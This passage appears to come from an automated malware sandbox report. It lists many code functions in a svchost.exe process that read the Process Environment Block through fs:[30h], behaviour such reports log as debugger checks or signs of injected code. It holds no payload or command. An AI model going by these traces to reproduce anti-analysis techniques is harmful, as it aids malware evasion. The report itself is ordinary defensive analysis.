                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386674D mov esi, dword ptr fs:[00000030h]7_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386674D mov eax, dword ptr fs:[00000030h]7_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386674D mov eax, dword ptr fs:[00000030h]7_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03830750 mov eax, dword ptr fs:[00000030h]7_2_03830750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038BE75D mov eax, dword ptr fs:[00000030h]7_2_038BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872750 mov eax, dword ptr fs:[00000030h]7_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872750 mov eax, dword ptr fs:[00000030h]7_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B4755 mov eax, dword ptr fs:[00000030h]7_2_038B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03838770 mov eax, dword ptr fs:[00000030h]7_2_03838770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]7_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]7_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]7_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]7_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]7_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]7_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]7_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]7_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]7_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]7_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]7_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840770 mov eax, dword ptr fs:[00000030h]7_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03834690 mov eax, dword ptr fs:[00000030h]7_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03834690 mov eax, dword ptr fs:[00000030h]7_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386C6A6 mov eax, dword ptr fs:[00000030h]7_2_0386C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038666B0 mov eax, dword ptr fs:[00000030h]7_2_038666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]7_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386A6C7 mov eax, dword ptr fs:[00000030h]7_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AE6F2 mov eax, dword ptr fs:[00000030h]7_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AE6F2 mov eax, dword ptr fs:[00000030h]7_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AE6F2 mov eax, dword ptr fs:[00000030h]7_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AE6F2 mov eax, dword ptr fs:[00000030h]7_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B06F1 mov eax, dword ptr fs:[00000030h]7_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B06F1 mov eax, dword ptr fs:[00000030h]7_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AE609 mov eax, dword ptr fs:[00000030h]7_2_038AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]7_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]7_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]7_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]7_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]7_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]7_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384260B mov eax, dword ptr fs:[00000030h]7_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03872619 mov eax, dword ptr fs:[00000030h]7_2_03872619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384E627 mov eax, dword ptr fs:[00000030h]7_2_0384E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03866620 mov eax, dword ptr fs:[00000030h]7_2_03866620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03868620 mov eax, dword ptr fs:[00000030h]7_2_03868620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383262C mov eax, dword ptr fs:[00000030h]7_2_0383262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384C640 mov eax, dword ptr fs:[00000030h]7_2_0384C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F866E mov eax, dword ptr fs:[00000030h]7_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F866E mov eax, dword ptr fs:[00000030h]7_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386A660 mov eax, dword ptr fs:[00000030h]7_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386A660 mov eax, dword ptr fs:[00000030h]7_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03862674 mov eax, dword ptr fs:[00000030h]7_2_03862674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03832582 mov eax, dword ptr fs:[00000030h]7_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03832582 mov ecx, dword ptr fs:[00000030h]7_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03864588 mov eax, dword ptr fs:[00000030h]7_2_03864588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E59C mov eax, dword ptr fs:[00000030h]7_2_0386E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B05A7 mov eax, dword ptr fs:[00000030h]7_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B05A7 mov eax, dword ptr fs:[00000030h]7_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B05A7 mov eax, dword ptr fs:[00000030h]7_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038545B1 mov eax, dword ptr fs:[00000030h]7_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038545B1 mov eax, dword ptr fs:[00000030h]7_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E5CF mov eax, dword ptr fs:[00000030h]7_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E5CF mov eax, dword ptr fs:[00000030h]7_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038365D0 mov eax, dword ptr fs:[00000030h]7_2_038365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386A5D0 mov eax, dword ptr fs:[00000030h]7_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386A5D0 mov eax, dword ptr fs:[00000030h]7_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]7_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]7_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]7_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]7_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]7_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]7_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]7_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E5E7 mov eax, dword ptr fs:[00000030h]7_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038325E0 mov eax, dword ptr fs:[00000030h]7_2_038325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386C5ED mov eax, dword ptr fs:[00000030h]7_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386C5ED mov eax, dword ptr fs:[00000030h]7_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C6500 mov eax, dword ptr fs:[00000030h]7_2_038C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]7_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]7_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]7_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]7_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]7_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]7_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03904500 mov eax, dword ptr fs:[00000030h]7_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840535 mov eax, dword ptr fs:[00000030h]7_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840535 mov eax, dword ptr fs:[00000030h]7_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840535 mov eax, dword ptr fs:[00000030h]7_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840535 mov eax, dword ptr fs:[00000030h]7_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840535 mov eax, dword ptr fs:[00000030h]7_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840535 mov eax, dword ptr fs:[00000030h]7_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E53E mov eax, dword ptr fs:[00000030h]7_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E53E mov eax, dword ptr fs:[00000030h]7_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E53E mov eax, dword ptr fs:[00000030h]7_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E53E mov eax, dword ptr fs:[00000030h]7_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385E53E mov eax, dword ptr fs:[00000030h]7_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03838550 mov eax, dword ptr fs:[00000030h]7_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03838550 mov eax, dword ptr fs:[00000030h]7_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386656A mov eax, dword ptr fs:[00000030h]7_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386656A mov eax, dword ptr fs:[00000030h]7_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386656A mov eax, dword ptr fs:[00000030h]7_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038EA49A mov eax, dword ptr fs:[00000030h]7_2_038EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038364AB mov eax, dword ptr fs:[00000030h]7_2_038364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038644B0 mov ecx, dword ptr fs:[00000030h]7_2_038644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038BA4B0 mov eax, dword ptr fs:[00000030h]7_2_038BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038304E5 mov ecx, dword ptr fs:[00000030h]7_2_038304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03868402 mov eax, dword ptr fs:[00000030h]7_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03868402 mov eax, dword ptr fs:[00000030h]7_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03868402 mov eax, dword ptr fs:[00000030h]7_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382E420 mov eax, dword ptr fs:[00000030h]7_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382E420 mov eax, dword ptr fs:[00000030h]7_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382E420 mov eax, dword ptr fs:[00000030h]7_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382C427 mov eax, dword ptr fs:[00000030h]7_2_0382C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]7_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]7_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]7_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]7_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]7_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]7_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B6420 mov eax, dword ptr fs:[00000030h]7_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386A430 mov eax, dword ptr fs:[00000030h]7_2_0386A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]7_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]7_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]7_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]7_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]7_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]7_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]7_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E443 mov eax, dword ptr fs:[00000030h]7_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038EA456 mov eax, dword ptr fs:[00000030h]7_2_038EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382645D mov eax, dword ptr fs:[00000030h]7_2_0382645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385245A mov eax, dword ptr fs:[00000030h]7_2_0385245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038BC460 mov ecx, dword ptr fs:[00000030h]7_2_038BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385A470 mov eax, dword ptr fs:[00000030h]7_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385A470 mov eax, dword ptr fs:[00000030h]7_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385A470 mov eax, dword ptr fs:[00000030h]7_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840BBE mov eax, dword ptr fs:[00000030h]7_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840BBE mov eax, dword ptr fs:[00000030h]7_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E4BB0 mov eax, dword ptr fs:[00000030h]7_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E4BB0 mov eax, dword ptr fs:[00000030h]7_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03850BCB mov eax, dword ptr fs:[00000030h]7_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03850BCB mov eax, dword ptr fs:[00000030h]7_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03850BCB mov eax, dword ptr fs:[00000030h]7_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03830BCD mov eax, dword ptr fs:[00000030h]7_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03830BCD mov eax, dword ptr fs:[00000030h]7_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03830BCD mov eax, dword ptr fs:[00000030h]7_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DEBD0 mov eax, dword ptr fs:[00000030h]7_2_038DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03838BF0 mov eax, dword ptr fs:[00000030h]7_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03838BF0 mov eax, dword ptr fs:[00000030h]7_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03838BF0 mov eax, dword ptr fs:[00000030h]7_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385EBFC mov eax, dword ptr fs:[00000030h]7_2_0385EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038BCBF0 mov eax, dword ptr fs:[00000030h]7_2_038BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03904B00 mov eax, dword ptr fs:[00000030h]7_2_03904B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]7_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]7_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]7_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]7_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]7_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]7_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]7_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]7_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AEB1D mov eax, dword ptr fs:[00000030h]7_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385EB20 mov eax, dword ptr fs:[00000030h]7_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385EB20 mov eax, dword ptr fs:[00000030h]7_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F8B28 mov eax, dword ptr fs:[00000030h]7_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F8B28 mov eax, dword ptr fs:[00000030h]7_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E4B4B mov eax, dword ptr fs:[00000030h]7_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E4B4B mov eax, dword ptr fs:[00000030h]7_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03902B57 mov eax, dword ptr fs:[00000030h]7_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03902B57 mov eax, dword ptr fs:[00000030h]7_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03902B57 mov eax, dword ptr fs:[00000030h]7_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03902B57 mov eax, dword ptr fs:[00000030h]7_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C6B40 mov eax, dword ptr fs:[00000030h]7_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C6B40 mov eax, dword ptr fs:[00000030h]7_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FAB40 mov eax, dword ptr fs:[00000030h]7_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D8B42 mov eax, dword ptr fs:[00000030h]7_2_038D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03828B50 mov eax, dword ptr fs:[00000030h]7_2_03828B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DEB50 mov eax, dword ptr fs:[00000030h]7_2_038DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382CB7E mov eax, dword ptr fs:[00000030h]7_2_0382CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]7_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]7_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]7_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]7_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]7_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]7_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]7_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]7_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383EA80 mov eax, dword ptr fs:[00000030h]7_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03904A80 mov eax, dword ptr fs:[00000030h]7_2_03904A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03868A90 mov edx, dword ptr fs:[00000030h]7_2_03868A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03838AA0 mov eax, dword ptr fs:[00000030h]7_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03838AA0 mov eax, dword ptr fs:[00000030h]7_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03886AA4 mov eax, dword ptr fs:[00000030h]7_2_03886AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03886ACC mov eax, dword ptr fs:[00000030h]7_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03886ACC mov eax, dword ptr fs:[00000030h]7_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03886ACC mov eax, dword ptr fs:[00000030h]7_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03830AD0 mov eax, dword ptr fs:[00000030h]7_2_03830AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03864AD0 mov eax, dword ptr fs:[00000030h]7_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03864AD0 mov eax, dword ptr fs:[00000030h]7_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386AAEE mov eax, dword ptr fs:[00000030h]7_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386AAEE mov eax, dword ptr fs:[00000030h]7_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038BCA11 mov eax, dword ptr fs:[00000030h]7_2_038BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386CA24 mov eax, dword ptr fs:[00000030h]7_2_0386CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385EA2E mov eax, dword ptr fs:[00000030h]7_2_0385EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03854A35 mov eax, dword ptr fs:[00000030h]7_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03854A35 mov eax, dword ptr fs:[00000030h]7_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386CA38 mov eax, dword ptr fs:[00000030h]7_2_0386CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]7_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]7_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]7_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]7_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]7_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]7_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03836A50 mov eax, dword ptr fs:[00000030h]7_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840A5B mov eax, dword ptr fs:[00000030h]7_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840A5B mov eax, dword ptr fs:[00000030h]7_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386CA6F mov eax, dword ptr fs:[00000030h]7_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386CA6F mov eax, dword ptr fs:[00000030h]7_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386CA6F mov eax, dword ptr fs:[00000030h]7_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DEA60 mov eax, dword ptr fs:[00000030h]7_2_038DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038ACA72 mov eax, dword ptr fs:[00000030h]7_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038ACA72 mov eax, dword ptr fs:[00000030h]7_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A0 mov eax, dword ptr fs:[00000030h]7_2_038429A0
